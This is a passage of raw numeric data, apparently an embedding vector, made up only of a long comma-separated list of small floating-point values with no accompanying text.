0.00836077518761158, 0.016735179349780083, 0.017702767625451088, -0.015590427443385124, -0.02444862574338913, 0.029272936284542084, -0.023126710206270218, -0.014677352271974087, -0.02153223380446434, 0.0025177723728120327, -0.007175140082836151, 0.0020459028892219067, -0.007829283364117146, -0.0012810316402465105, -0.010118787176907063, 0.009137571789324284, 0.012721734121441841, -0.025239048525691032, -0.02556612156331539, 0.02593407593667507, -0.04170166701078415, 0.018793007358908653, 0.04260111600160599, -0.011556540615856647, -0.022990429773926735, -0.015127075836062431, 0.0005992059595882893, -0.001148158684372902, -0.023412898182868958, -0.002355939941480756, 0.009028547443449497, 0.007522653788328171, -0.004636925645172596, -0.02120516262948513, 0.014527443796396255, -0.025525236502289772, 0.009444201365113258, -0.0031157005578279495, -0.018629470840096474, -0.021627629175782204, -0.02021031826734543, 0.016994111239910126, 0.020523762330412865, -0.01951529085636139, -0.024176064878702164, -0.009416945278644562, 0.015917498618364334, -0.005604513455182314, -0.008108657784759998, -0.03099006414413452, -0.023889876902103424, -0.005256999749690294, 0.017484718933701515, -0.02613849751651287, -0.0090012913569808, -0.010173299349844456, -0.005989504512399435, 0.011154514737427235, 0.006807184312492609, 0.014922656118869781, -0.03592339903116226, 0.012967037968337536, -0.021504977717995644, -0.018179746344685555, 0.006088307127356529, 0.01692597195506096, -0.030172383412718773, -0.016694296151399612, 0.01861584186553955, 0.038567230105400085, 0.008326705545186996, -0.007958749309182167, -0.014581955969333649, -0.003795397002249956, 0.013593926094472408, 0.007727073971182108, 0.01099097914993763, -0.007372745778411627, -0.01708950661122799, 0.02181842178106308, 0.0007180250249803066, 0.01195856649428606, -0.022172749042510986, -0.008783243596553802, -0.028864094987511635, -0.005066207610070705, -0.024434996768832207, -0.00985985528677702, 0.0017614185344427824, -0.01526335533708334, 0.017184903845191002, 0.0018670355202630162, 0.034288037568330765, -0.04606262594461441, -0.004715286660939455, -0.00906261708587408, 0.00418038759380579, -0.017511975020170212, 0.039711982011795044, -0.009389689192175865, -0.0034257376100867987, -0.035569071769714355, 0.013893742114305496, -0.017266670241951942, -0.021477721631526947, -0.008190426044166088, -0.009934809058904648, -0.008197239600121975, 0.007372745778411627, 0.01882026344537735, 0.015890244394540787, 0.02041473798453808, -0.007842911407351494, -0.01204033475369215, 0.020305713638663292, -0.0076589337550103664, -0.010350462980568409, -0.023317500948905945, -0.0017077582888305187, -0.02567514404654503, 0.011651936918497086, -0.018397795036435127, -0.0009744017152115703, 0.010030205361545086, -0.041156549006700516, -0.013757461681962013, -0.009076245129108429, -0.014459303580224514, 0.009846227243542671, -0.03327956795692444, -0.012708106078207493, -0.022704241797327995, -0.00040458113653585315, -0.000043226300476817414, 0.0061734821647405624, -0.008292635902762413, 0.02834623120725155, 0.06944826990365982, 0.006095121148973703, -0.01226519700139761, -0.015726707875728607, -0.004183794837445021, 0.019215473905205727, 0.01663978397846222, 0.018547702580690384, 0.031562440097332, 0.012455988675355911, 0.012285638600587845, 0.007652119733393192, -0.00016960466746240854, 0.0011839321814477444, 0.0015655161114409566, 0.018765751272439957, -0.01068434864282608, -0.01561768352985382, 0.01976059377193451, 0.00777477165684104, -0.008415287360548973, 0.0034001851454377174, 0.00016885939112398773, -0.004967404529452324, 0.006773114204406738, -0.009887111373245716, 0.007672561798244715, -0.01845230720937252, 0.00777477165684104, -0.012462802231311798, -0.0005655618151649833, -0.003560313954949379, -0.015604055486619473, -0.012094846926629543, 0.02202284149825573, 0.01861584186553955, 0.01590387150645256, 0.013328180648386478, 0.01216298621147871, -0.010738860815763474, 0.01574033498764038, -0.004493831656873226, -0.010289137251675129, -0.004987846594303846, 0.00025382143212482333, 0.0037783619482070208, 0.032652679830789566, -0.011944938451051712, -0.02218637801706791, 0.004282597918063402, 0.03496943786740303, -0.014745491556823254, 0.037040892988443375, 0.01148158684372902, 0.016244571655988693, 0.023985274136066437, -0.034860413521528244, -0.0038465019315481186, -0.00408839900046587, -0.00998250674456358, 0.007904238067567348, 0.02793739177286625, 0.027964647859334946, 0.01947440579533577, 0.01786630228161812, -0.0038533159531652927, 0.01436390820890665, 0.021218789741396904, -0.016258198767900467, 0.019583430141210556, -0.000926703738514334, -0.003982781898230314, -0.013818788342177868, 0.011447517201304436, 0.0026915292255580425, 0.01300792209804058, 0.047888778150081635, -0.00623480835929513, -0.01651713065803051, 0.0022946137469261885, 0.009907552972435951, -0.007699817884713411, 0.012980666011571884, 0.0007286719046533108, -0.009621364995837212, 0.037613268941640854, -0.008006447926163673, 0.005853224545717239, 0.022772381082177162, 0.0034598074853420258, 0.015331495553255081, 0.0017247932264581323, 0.03551455959677696, 0.020809950307011604, 0.01832965575158596, 0.024148808792233467, -0.012435546144843102, -0.006851475220173597, -0.018602214753627777, -0.007379559800028801, 0.0037408850621432066, -0.002216252963989973, 0.02752855233848095, 0.0050423587672412395, -0.008653777651488781, 0.007522653788328171, 0.015454147942364216, 0.007181954104453325, 0.004272376652806997, -0.007815656252205372, -0.029027631506323814, -0.010888769291341305, -0.019733337685465813, -0.0016677260864526033, -0.022567961364984512, -0.012619524262845516, 0.004095213022083044, -0.004827717784792185, -0.006125784479081631, -0.026642732322216034, -0.015522287227213383, -0.004504052922129631, 0.010030205361545086, -0.016040151938796043, 0.003631860949099064, 0.015304239466786385, -0.02538895606994629, -0.03191676735877991, 0.015399635769426823, 0.031862255185842514, 0.0016336560947820544, 0.011992637068033218, -0.0019419894088059664, -0.003536465112119913, 0.018970170989632607, -0.032243840396404266, 0.024721184745430946, 0.014350280165672302, 0.021586745977401733, -0.0068105910904705524, -0.009682691656053066, 0.03262542188167572, 0.024639416486024857, -0.00928747933357954, 0.006279099266976118, 0.0161900594830513, -0.004953776486217976, -0.0013892038259655237, -0.001443715882487595, -0.013164644129574299, 0.006991161964833736, -0.00041352451080456376, 0.019419893622398376, 0.013450832106173038, 0.013130574487149715, -0.004306446760892868, 0.00519908033311367, -0.006180296186357737, -0.007795213721692562, 0.008701475337147713, 0.01647624745965004, -0.014745491556823254, 0.019692454487085342, 0.0030288221314549446, 0.011822286993265152, 0.02284052222967148, 0.006681125145405531, -0.02785562351346016, -0.01668066717684269, -0.009253409691154957, 0.010050646960735321, 0.016081035137176514, -0.017634626477956772, 0.030090615153312683, 0.0027255993336439133, 0.009457829408347607, -0.011120445095002651, -0.006868510041385889, 0.010534441098570824, -0.01963794231414795, -0.003826059866696596, 0.02432597242295742, 0.008183611556887627, -0.018670354038476944, -0.009253409691154957, -0.0021395953372120857, -0.006044016219675541, 0.017348438501358032, -0.05205894634127617, 0.009744017384946346, -0.0023627537302672863, 0.012190242297947407, -0.005791898351162672, -0.017062250524759293, -0.026860781013965607, -0.011379376985132694, -0.04314623400568962, 0.006486926227807999, 0.02424420602619648, -0.010841070674359798, 0.018629470840096474, -0.014186743646860123, 0.001572330016642809, 0.010343649424612522, -0.011658750474452972, -0.024598533287644386, 0.01663978397846222, 0.008258565329015255, 0.0065584732219576836, 0.0032468701247125864, 0.0029691995587199926, 0.04573555663228035, 0.008026889525353909, -0.016258198767900467, 0.02053738944232464, 0.012871642597019672, 0.01971971057355404, -0.026315661147236824, -0.014704607427120209, -0.002303131390362978, -0.018302399665117264, 0.006997975986450911, 0.0054511986672878265, -0.005883887410163879, -0.021191533654928207, 0.014909028075635433, 0.04919706657528877, -0.028373487293720245, 0.008960407227277756, 0.011645122431218624, -0.010854698717594147, 0.02322210557758808, -0.006694753188639879, 0.0026233892422169447, -0.016994111239910126, -0.006783335004001856, 0.013096503913402557, 0.012135730125010014, 0.0043575516901910305, -0.020619157701730728, 0.020728182047605515, -0.0057339794002473354, -0.02210460975766182, -0.020292086526751518, 0.011617866344749928, -0.00017365047824569046, 0.013130574487149715, 0.0004265136958565563, -0.019992269575595856, -0.003533058101311326, 0.0102141834795475, -0.01169282104820013, 0.008108657784759998, -0.0029726065695285797, 0.008060960099101067, -0.013082875870168209, -0.015849359333515167, 0.003226428059861064, 0.021177906543016434, 0.0016481358325108886, -0.0029981592670083046, 0.006551659200340509, -0.008244937285780907, 0.017552858218550682, -0.017525603994727135, 0.018929285928606987, -0.0034598074853420258, -0.017689138650894165, -0.0013508751289919019, 0.008721917867660522, 0.010105159133672714, -0.009771273471415043, -0.0010757599957287312, -0.000004245440322847571, -0.022976800799369812, 0.005686281248927116, -0.0030935551039874554, -0.013178272172808647, 0.02218637801706791, 0.00307652004994452, 0.012503686361014843, 0.03398822247982025, -0.023780852556228638, -0.015781220048666, 0.0056317695416510105, -0.015999266877770424, -0.04017533361911774, -0.015753963962197304, -0.026724500581622124, 0.014868143945932388, 0.00042715249583125114, -0.00906261708587408, -0.003952119033783674, -0.03537827730178833, 0.0036897799000144005, -0.010111972689628601, -0.0030850376933813095, 0.019855991005897522, -0.007400001864880323, 0.013709763996303082, 0.04151087626814842, 0.03240737318992615, -0.008347148075699806, -0.000798941298853606, -0.023372013121843338, -0.0046164835803210735, -0.004572192672640085, 0.002224770374596119, 0.0062995413318276405, -0.02785562351346016, 0.006302948109805584, -0.024639416486024857, 0.017225787043571472, 0.008830941282212734, 0.003563720965757966, -0.01526335533708334, 0.0004373734991531819, 0.008006447926163673, -0.008497055619955063, -0.010902397334575653, 0.01493628416210413, -0.004854973405599594, -0.014118604362010956, -0.027991903945803642, -0.02021031826734543, -0.015958383679389954, 0.0030611886177212, -0.001913029933348298, 0.00397596787661314, -0.021027998998761177, 0.010950095020234585, -0.002877210732549429, -0.000641367572825402, -0.00513775460422039, 0.0014922656118869781, -0.02181842178106308, 0.0018091164529323578, -0.02597496099770069, -0.04159264266490936, -0.0014411605661734939, -0.02128693088889122, -0.020360225811600685, 0.005972469225525856, 0.01308969035744667, -0.008578823879361153, 0.002749448176473379, 0.006333611439913511, 0.02116427756845951, 0.007113813888281584, 0.0014130529016256332, 0.000027136215067002922, 0.010261881165206432, 0.005751014221459627, -0.007863353937864304, -0.00039776714402250946, -0.005832782480865717, -0.007134255953133106, 0.009410131722688675, 0.03349761292338371, -0.012415104545652866, -0.00038435208261944354, 0.019201846793293953, -0.008510683663189411, -0.005744200199842453, 0.021382326260209084, 0.000013960710930405185, -0.020741811022162437, 0.014404792338609695, 0.00893996562808752, -0.03843094781041145, -0.00027596691506914794, 0.008217682130634785, -0.0026796048041433096, -0.00385672296397388, -0.016367223113775253, 0.014581955969333649, -0.00039670243859291077, -0.009089873172342777, -0.00256717368029058, -0.014432047493755817, -0.008469799533486366, -0.0012512203538790345, 0.00003449586438364349, 0.018316026777029037, -0.011829100549221039, -0.0047050658613443375, -0.02930019237101078, 0.014064092189073563, -0.029763543978333473, 0.008899081498384476, 0.00279884971678257, 0.015004423446953297, -0.01358029805123806, 0.03431529551744461, 0.013995951972901821, 0.03183499723672867, -0.0019522104412317276, -0.011965380981564522, -0.004132689908146858, 0.009600923396646976, 0.002618278842419386, -0.012960224412381649, -0.005652211606502533, 0.016217315569519997, -0.01161105278879404, -0.004977625794708729, -0.017702767625451088, -0.01894291490316391, 0.011570168659090996, -0.017566487193107605, 0.0102141834795475, -0.012742176651954651, 0.009076245129108429, 0.0004786833596881479, 0.0019011055119335651, -0.011679193004965782, -0.0065584732219576836, 0.01786630228161812, 0.01787993125617504, 0.0024291903246194124, -0.001602141303010285, 0.026901664212346077, -0.012626338750123978, -0.04916980862617493, -0.006667497102171183, -0.00860607996582985, 0.03693186864256859, -0.012932968325912952, 0.0021668514236807823, -0.004967404529452324, -0.0045858207158744335, 0.003139549633488059, 0.03532376512885094, 0.015999266877770424, 0.03085378371179104, 0.008456171490252018, -0.019460778683423996, -0.007992819882929325, 0.013035178184509277, 0.00858563743531704, 0.0046335188671946526, 0.005270627327263355, 0.012510500848293304, 0.010875141248106956, 0.004224678967148066, -0.0029300192836672068, -0.015576799400150776, 0.00006957730511203408, -0.02363094501197338, -0.01436390820890665, 0.03725894168019295, -0.004579006694257259, 0.006868510041385889, 0.005621548276394606, 0.012912526726722717, -0.016530759632587433, 0.01148158684372902, -0.004125875886529684, -0.023521920666098595, -0.0003634841996245086, -0.00464373966678977, 0.004384807776659727, 0.009396503679454327, 0.0149771673604846, 0.02658822014927864, -0.003326934529468417, 0.010650279000401497, 0.0039964099414646626, -0.019079195335507393, 0.01729392632842064, 0.016871459782123566, -0.01033683493733406, 0.010997792705893517, 0.018520446494221687, 0.007066116202622652, -0.029600007459521294, -0.0082994494587183, -0.006946871057152748, -0.008435729891061783, 0.01647624745965004, 0.018561331555247307, 0.015099819749593735, -0.006687939167022705, 0.0029283156618475914, 0.0059622484259307384, 0.03167146444320679, -0.008224495686590672, -0.0015442223520949483, -0.0165988989174366, 0.01006427500396967, 0.007986005395650864, 0.0025365108158439398, -0.006909394171088934, 0.01125672459602356, 0.005093463696539402, -0.008612893521785736, -0.0006281654350459576, 0.015917498618364334, 0.015672195702791214, 0.0049639977514743805, -0.0011387894628569484, -0.022404424846172333, 0.0011643419275060296, -0.01786630228161812, -0.008824127726256847, -0.00429281871765852, -0.0037340710405260324, 0.02112339437007904, 0.019569803029298782, -0.02330387383699417, 0.016707923263311386, -0.007863353937864304, -0.027051571756601334, 0.01741657964885235, -0.011883612722158432, -0.0020084260031580925, -0.003071409650146961, 0.016121920198202133, -0.008115471340715885, -0.0019198439549654722, -0.005730572156608105, 0.010118787176907063, -0.005165010690689087, -0.021423209458589554, -0.024625789374113083, 0.027228737249970436, 0.01708950661122799, -0.01007108949124813, -0.0170077383518219, -0.029409214854240417, -0.012435546144843102, -0.01935175433754921, -0.004234899766743183, -0.018397795036435127, -0.0024394113570451736, -0.005713537335395813, 0.016258198767900467, -0.0025978367775678635, -0.003057781606912613, -0.014949912205338478, -0.0030134906992316246, 0.0032349457032978535, -0.008544753305613995, 0.015604055486619473, -0.01688508689403534, -0.015535915270447731, -0.015958383679389954, -0.019896874204277992, -0.018683983013033867, -0.001118347398005426, -0.010745675303041935, -0.01861584186553955, -0.009178454987704754, -0.005260406527668238, 0.001571478322148323, 0.005986097268760204, -0.02724236436188221, -0.0031191075686365366, -0.020769065245985985, 0.008810499683022499, -0.01655801571905613, -0.0037545128725469112, 0.026288405060768127, 0.00704567413777113, -0.010997792705893517, 0.018029838800430298, -0.0043268888257443905, -0.010295950807631016, -0.007781585678458214, -0.01725304313004017, 0.0008951890049502254, 0.00817679800093174, -0.00687191728502512, 0.00906261708587408, 0.000420125579694286, -0.007842911407351494, 0.017321182414889336, -0.0058123404160141945, 0.026656361296772957, -0.008612893521785736, 0.01890202984213829, -0.02059190161526203, -0.008456171490252018, -0.03595065325498581, 0.01561768352985382, -0.0184114221483469, 0.013771089725196362, -0.012558198533952236, -0.001229926710948348, 0.013546228408813477, 0.021586745977401733, 0.030799271538853645, 0.009035360999405384, 0.005601106211543083, 0.008755987510085106, -0.0020799729973077774, -0.012823943980038166, -0.012217498384416103, 0.03180774301290512, 0.020428366959095, 0.004459761548787355, 0.0055534085258841515, -0.002884024754166603, 0.010452672839164734, -0.0038294668775051832, -0.009110315702855587, 0.02128693088889122, -0.005996318534016609, 0.0028601756785064936, -0.004442726727575064, -0.013239597901701927, 0.002221363363787532, -0.0045006456784904, 0.014200371690094471, -0.002430893713608384, -0.011883612722158432, 0.005815747193992138, -0.011774588376283646, -0.009416945278644562, -0.010316393338143826, 0.0076180496253073215, -0.0001253136870218441, -0.009614551439881325, 0.005665839184075594, -0.01119539886713028, 0.0065584732219576836, 0.024639416486024857, -0.0032996786758303642, 0.009580480866134167, -0.016776062548160553, 0.019215473905205727, -0.0184114221483469, 0.023440154269337654, -0.005165010690689087, -0.004490424878895283, 0.018561331555247307, -0.024107925593852997, -0.012653594836592674, -0.002471777843311429, -0.019610686227679253, 0.01738932356238365, -0.0059929112903773785, 0.024216949939727783, -0.012428732588887215, -0.019488034769892693, -0.004449540749192238, 0.02281326614320278, -0.0006311465986073017, -0.004214457701891661, 0.006125784479081631, 0.025525236502289772, 0.014254883863031864, -0.00043268888839520514, 0.014418420381844044, -0.017934443429112434, -0.02375359646975994, -0.004742542747408152, 0.010854698717594147, -0.0145683279260993, 0.03676833212375641, 0.0042962259612977505, -0.000011605090548982844, 0.015440519899129868, 0.004745949525386095, -0.00006553149432875216, 0.0005830227164551616, -0.007372745778411627, 0.036877356469631195, 0.014881771989166737, -0.0011660454329103231, 0.002311648800969124, 0.015331495553255081, -0.002752855187281966, -0.010180112905800343, -0.020646413788199425, -0.009307920932769775, -0.021600373089313507, 0.005417128559201956, -0.0149771673604846, -0.009389689192175865, 0.0034189235884696245, -0.0017460869858041406, 0.014541071839630604, -0.018847519531846046, -0.011965380981564522, 0.01125672459602356, 0.0021293743047863245, -0.01598563976585865, -0.0035023950040340424, -0.0025126617401838303, 0.013764276169240475, 0.00018674613966140896, 0.007318234071135521, -0.008885453455150127, -0.024380484595894814, -0.03085378371179104, -0.004670995753258467, 0.023453781381249428, 0.004204236902296543, -0.011638308875262737, -0.0021174498833715916, 0.003529651090502739, -0.004170166794210672, 0.010432231239974499, -0.00513775460422039, 0.02153223380446434, 0.008510683663189411, 0.024802953004837036, -0.002810774138197303, 0.0011950049083679914, 0.027637576684355736, -0.012748990207910538, 0.006589136086404324, 0.008040517568588257, -0.006415379233658314, 0.015072563663125038, 0.001778453472070396, -0.0115429125726223, 0.017907187342643738, 0.0019896873272955418, -0.003969153854995966, 0.02275875397026539, -0.006636834237724543, 0.0030628922395408154, -0.008026889525353909, -0.0035398718900978565, -0.00009789798787096515, -0.017402950674295425, 0.0013568373396992683, -0.0015902167651802301, 0.023058569058775902, -0.004653960466384888, 0.03232560679316521, -0.0011873391922563314, -0.000020867868443019688, 0.009594108909368515, 0.013525785878300667, -0.017443835735321045, -0.028755072504281998, 0.004640332888811827, 0.008026889525353909, -0.009784901514649391, -0.0009556632139720023, 0.00151526287663728, 0.011556540615856647, 0.010105159133672714, 0.0023082417901605368, 0.018793007358908653, -0.032107558101415634, 0.011931310407817364, -0.013198714703321457, -0.005239964462816715, -0.016707923263311386, -0.008101843297481537, 0.0065993573516607285, -0.00583618925884366, -0.01012560073286295, -0.0033286381512880325, -0.001121754408814013, -0.018438678234815598, -0.00943057332187891, -0.0027767042629420757, -0.006323390174657106, 0.0010570214362815022, 0.010527626611292362, -0.0020731589756906033, 0.0007572055328637362, -0.021109765395522118, 0.0038328738883137703, -0.009996134787797928, -0.010588953271508217, 0.013110131956636906, 0.02387624979019165, -0.01590387150645256, -0.01493628416210413, -0.00583618925884366, 0.02654733695089817, -0.02905488759279251, 0.019787849858403206, 0.0012205573730170727, 0.00817679800093174, -0.011713262647390366, 0.0029385366942733526, -0.00011349565465934575, 0.03693186864256859, -0.02034659869968891, -0.01594475470483303, -0.004166760016232729, 0.015045307576656342, -0.00020676225540228188, -0.02498011663556099, -0.0017230897210538387, -0.020482879132032394, 0.008544753305613995, -0.023576432839035988, 0.0024666672106832266, 0.0019522104412317276, 0.0019011055119335651, -0.0018959949957206845, 0.007829283364117146, 0.002449632389470935, -0.014868143945932388, -0.006674311123788357, -0.00388738582842052, 0.020850833505392075, -0.0008696364820934832, -0.01967882737517357, -0.03216207027435303, 0.009560039266943932, -0.00385672296397388, -0.008715103380382061, 0.029927080497145653, -0.004316667560487986, -0.017103135585784912, -0.013818788342177868, 0.018711239099502563, -0.016421735286712646, -0.009321548976004124, 0.012176614254713058, 0.020905345678329468, -0.00008187444473151118, -0.02046925015747547, 0.008258565329015255, -0.005870259366929531, 0.01201989222317934, -0.015753963962197304, 0.015508659183979034, -0.026233892887830734, 0.011447517201304436, -0.001736717764288187, 0.010670720599591732, 0.0030509675852954388, 0.010050646960735321, -0.008558381348848343, 0.004136096686124802, 0.0013892038259655237, -0.007543095853179693, -0.033388592302799225, -0.017702767625451088, 0.008415287360548973, -0.017730023711919785, 0.005529559217393398, 0.00106553896330297, -0.0030373395420610905, -0.00562836229801178, -0.009818971157073975, -0.018506819382309914, -0.006187110207974911, -0.014268511906266212, -0.002052716910839081, -0.0327889584004879, 0.013798345811665058, 0.014173115603625774, 0.004967404529452324, 0.003526244079694152, 0.0008044776623137295, -0.026070356369018555, -0.005427349358797073, -0.006248436402529478, -0.02309945411980152, 0.017702767625451088, -0.017498347908258438, -0.01317145861685276, -0.006681125145405531, -0.0037545128725469112, -0.00467440253123641, -0.006561879999935627, 0.010868326760828495, -0.02938196063041687, 0.0064324140548706055, -0.009825785644352436, -0.004711879882961512, 0.006796963047236204, 0.0019215474603697658, -0.011270352639257908, -0.01606740802526474, 0.026438312605023384, -0.008837755769491196, -0.031453415751457214, 0.01300792209804058, 0.012442360632121563, -0.005120719783008099, -0.009614551439881325, -0.006640241015702486, -0.007168326061218977, -0.009253409691154957, 0.008163169957697392, -0.006684531923383474, -0.020373854786157608, -0.014295767992734909, -0.013076062314212322, 0.005955434404313564, 0.011536099016666412, 0.021055253222584724, 0.03240737318992615, 0.0027664832305163145, 0.009042175486683846, -0.01308969035744667, -0.011038676835596561, -0.0011311236303299665, -0.0014658613363280892, 0.0007733887759968638, -0.006115563213825226, -0.0021242639049887657, 0.013328180648386478, 0.009764458984136581, 0.005822561215609312, 0.013750648126006126, -0.008953593671321869, 0.016735179349780083, 0.011011420749127865, 0.021954702213406563, -0.02387624979019165, 0.020278457552194595, 0.009314735420048237, 0.019447149708867073, -0.009028547443449497, -0.012142544612288475, -0.02038748189806938, 0.02271786890923977, 0.026247519999742508, -0.02626114897429943, 0.003798804013058543, 0.0028312162030488253, 0.0029249086510390043, -0.009737202897667885, 0.011856356635689735, 0.006957091856747866, -0.02202284149825573, 0.004974218551069498, -0.015372379682958126, 0.0021821828559041023, 0.0024888128973543644, 0.024639416486024857, -0.007979191839694977, -0.0106230229139328, 0.01996501348912716, -0.017280299216508865, -0.013750648126006126, 0.018874773755669594, 0.03456059843301773, 0.002952164737507701, 0.020373854786157608, -0.016653411090373993, 0.0005263813654892147, -0.01323278434574604, 0.0027784076519310474, 0.011631494387984276, 0.009246595203876495, -0.0063608670607209206, 0.013566670008003712, 0.0005957989487797022, -0.01886114664375782, -0.00664705503731966, -0.016244571655988693, -0.004371179733425379, -0.02161400206387043, -0.021273301914334297, 0.009478271007537842, -0.026111241430044174, -0.008674219250679016, -0.000919037964195013, 0.005839596502482891, 0.023249361664056778, -0.0009820674313232303, -0.006722009275108576, -0.018561331555247307, -0.016448991373181343, -0.0019028090173378587, -0.0133554358035326, 0.005100277718156576, -0.024434996768832207, -0.002228177385404706, -0.02399890124797821, -0.012810315936803818, -0.0026557557284832, -0.00014170986833050847, -0.0037272570189088583, -0.007945122197270393, 0.008129099383950233, -0.011536099016666412, 0.008592451922595501, -0.010520813055336475, -0.014622840099036694, 0.001384093309752643, -0.027392271906137466, -0.027392271906137466, -0.014254883863031864, 0.017034994438290596, 0.0015552950790151954, -0.0001875978778116405, -0.020782694220542908, 0.005870259366929531, -0.0014471228932961822, 0.004551750607788563, -0.0004492980078794062, 0.020905345678329468, 0.006831033155322075, -0.005430756602436304, -0.026193007826805115, 0.006650462280958891, -0.0047561707906425, -0.005880480166524649, 0.0038022110238671303, -0.0007563537801615894, 0.0026097611989825964, 0.006227994337677956, 0.013266853988170624, 0.006807184312492609, -0.013675694353878498, 0.0035773490089923143, -0.008060960099101067, -0.009600923396646976, -0.007495397701859474, 0.009307920932769775, -0.006139412056654692, -0.004984439816325903, -0.0036557100247591734, 0.0005881332326680422, -0.01692597195506096, -0.006425600033253431, 0.020523762330412865, 0.013055620715022087, -0.023671830072999, -0.028618792071938515, -0.02338564209640026, -0.020850833505392075, -0.009805343113839626, 0.026111241430044174, -0.0035023950040340424, 0.010377719067037106, 0.000851749733556062, -0.011209026910364628, 0.012980666011571884, 0.012319708243012428, 0.024067040532827377, 0.008892267942428589, -0.00644263532012701, 0.026574593037366867, 0.005447791423648596, 0.0019419894088059664, 0.008633335120975971, -0.0027664832305163145, 0.037122663110494614, 0.0005672653205692768, 0.0015169662656262517, -0.0016029929975047708, 0.021273301914334297, 0.009539597667753696, 0.02395801804959774, 0.0034052955452352762, 0.003136142622679472, -0.014445675536990166, -0.032652679830789566, 0.0010459487093612552, -0.0026608663611114025, -0.008435729891061783, -0.00510368449613452, -0.019828734919428825, 0.014241255819797516, 0.01070479117333889, -0.008197239600121975, -0.021096138283610344, 0.004071363713592291, 0.026860781013965607, -0.0029351296834647655, -0.01704862341284752, 0.0009360729600302875, 0.003139549633488059, 0.022445309907197952, 0.016121920198202133, -0.00838121771812439, -0.030335919931530952, 0.005270627327263355, 0.01729392632842064, -0.017062250524759293, 0.0019079194171354175, 0.013593926094472408, 0.025089140981435776, -0.0010433935094624758, -0.01039816066622734, 0.005117312539368868, 0.016776062548160553, -0.01033683493733406, 0.012285638600587845, -0.01766188256442547, -0.008558381348848343, 0.02263610251247883, 0.022486193105578423, 0.03780405968427658, -0.011863171122968197, 0.007420443929731846, 0.002141298959031701, -0.012919340282678604, -0.019201846793293953, -0.007072930224239826, -0.00348195293918252, -0.0020918974187225103, -0.0036250469274818897, -0.017362067475914955, -0.023072198033332825, -0.004575599916279316, 0.00510368449613452, -0.0129465963691473, -0.013532600365579128, -0.0009054099791683257, 0.003057781606912613, 0.007911051623523235, 0.0009045582264661789, 0.002453039400279522, 0.011651936918497086, -0.011358934454619884, 0.006207552272826433, -0.017430206760764122, 0.0007580572855658829, -0.02338564209640026, -0.011890426278114319, -0.01623094268143177, 0.00044333573896437883, -0.01308969035744667, 0.028046416118741035, -0.027010688558220863, 0.0019641348626464605, -0.0017903780099004507, 0.005911143496632576, 0.009934809058904648, 0.011249911040067673, -0.020496506243944168, 0.00928747933357954, -0.026492824777960777, 0.0022895033471286297, -0.02748766914010048, -0.00018355206702835858, 0.019978642463684082, 0.0056147342547774315, -0.03657754138112068, -0.0030407465528696775, -0.008074588142335415, 0.0005059393588453531, 0.010922838933765888, 0.0003334600187372416, -0.013668879866600037, -0.014759119600057602, 0.011147701181471348, -0.005304697435349226, 0.0036182329058647156, -0.02638380043208599, -0.001984576927497983, -0.0001903660740936175, 0.03191676735877991, -0.020196691155433655, -0.013321366161108017, -0.011992637068033218, 0.0056624324060976505, -0.0017733429558575153, -0.013709763996303082, -0.02761032059788704, -0.011134073138237, 0.012599082663655281, -0.009771273471415043, 0.0011992636136710644, -0.0018857739632949233, -0.004054328892379999, 0.013491716235876083, -0.0005242519546300173, 0.0028669897001236677, -0.0007537985220551491, 0.006456263363361359, -0.015358751639723778, -0.000015464582247659564, -0.001875552930869162, 0.0018176339799538255, -0.006435821298509836, 0.02046925015747547, 0.0038056180346757174, 0.0003162120992783457, -0.013689322397112846, 0.009866668842732906, 0.0007716852705925703, 0.02145046554505825, -0.0011507138842716813, -0.022949544712901115, 0.020619157701730728, -0.014786375686526299, 0.023671830072999, -0.011011420749127865, -0.003383150091394782, -0.0067083812318742275, 0.024067040532827377, -0.00795193575322628, 0.00710699986666441, -0.0175937432795763, -0.004602855537086725, 0.00014820446085650474, 0.004115654621273279, 0.003485359949991107, -0.0007968118879944086, 0.006054237484931946, 0.019978642463684082, -0.015018051490187645, 0.020891718566417694, -0.00017365047824569046, -0.009975693188607693, -0.013123759999871254, -0.02350829355418682, 0.036141443997621536, -0.022854149341583252, -0.001875552930869162, -0.016544386744499207, -0.020292086526751518, -0.020455623045563698, 0.007181954104453325, 0.000911372248083353, 0.015958383679389954, -0.008531125262379646, 0.019051939249038696, 0.018152490258216858, 0.017307555302977562, 0.005079835653305054, 0.00559769943356514, -0.005154789425432682, -0.01409134827554226, -0.0008568602497689426, -0.01947440579533577, 0.0009505527559667826, -0.0036727450788021088, -0.009267037734389305, 0.016816947609186172, -0.00687191728502512, 0.026601849123835564, -0.005420535337179899, -0.01771639473736286, 0.007290977984666824, -0.0016813540132716298, 0.01655801571905613, -0.03851271793246269, 0.01873849518597126, -0.008067773655056953, 0.020428366959095, -0.01409134827554226, 0.015590427443385124, -0.01976059377193451, 0.01692597195506096, -0.011059118434786797, -0.010186927393078804, -0.0031225145794451237, -0.009137571789324284, -0.006619798950850964, -0.0013253226643428206, 0.011842728592455387, -0.01631271094083786, 0.02938196063041687, -0.0055670365691185, -0.012142544612288475, -0.005550001282244921, 0.021464094519615173, 0.0138664860278368, -0.02021031826734543, -0.00006904496694914997, -0.011883612722158432, -0.009321548976004124, -0.018016211688518524, -0.007434071972966194, -0.020428366959095, -0.008892267942428589, -0.0020050189923495054, -0.0024581498000770807, -0.006064458284527063, 0.01505893561989069, 0.011127258650958538, -0.0014300878392532468, 0.016244571655988693, 0.005563629325479269, -0.015835732221603394, 0.021150650456547737, -0.007202396169304848, -0.0009011512738652527, 0.0230858251452446, -0.012721734121441841, -0.005362616386264563, 0.0011694524437189102, 0.01980147883296013, -0.00015406023885589093, -0.012578640133142471, -0.009675877168774605, -0.006534624379128218, 0.006340424995869398, -0.010895582847297192, 0.018602214753627777, 0.0022383984178304672, 0.004851566627621651, 0.03456059843301773, 0.020605530589818954, 0.017770906910300255, -0.015127075836062431, -0.009962065145373344, -0.004691437818109989, -0.0026881222147494555, 0.003812431823462248, 0.006837847176939249, -0.013423576019704342, -0.020605530589818954, -0.006531217135488987, -0.016408108174800873, 0.0003664653340820223, 0.001151565695181489, -0.0005783381056971848, 0.02279963716864586, -0.014868143945932388, 0.01808435097336769, -0.02055101841688156, 0.0031037761364132166, -0.0015186697710305452, 0.010282322764396667, 0.010370905511081219, -0.00017503456911072135, -0.003645488992333412, -0.004350737668573856, 0.036468517035245895, -0.013491716235876083, 0.00496059050783515, -0.012319708243012428, -0.0003326082951389253, -0.024434996768832207, 0.020987113937735558, 0.03246188536286354, -0.026520080864429474, -0.01967882737517357, -0.016012895852327347, 0.004074770957231522, 0.018929285928606987, 0.007474956102669239, -0.008708289824426174, -0.003461511107161641, 0.017566487193107605, 0.038812533020973206, -0.009158013388514519, 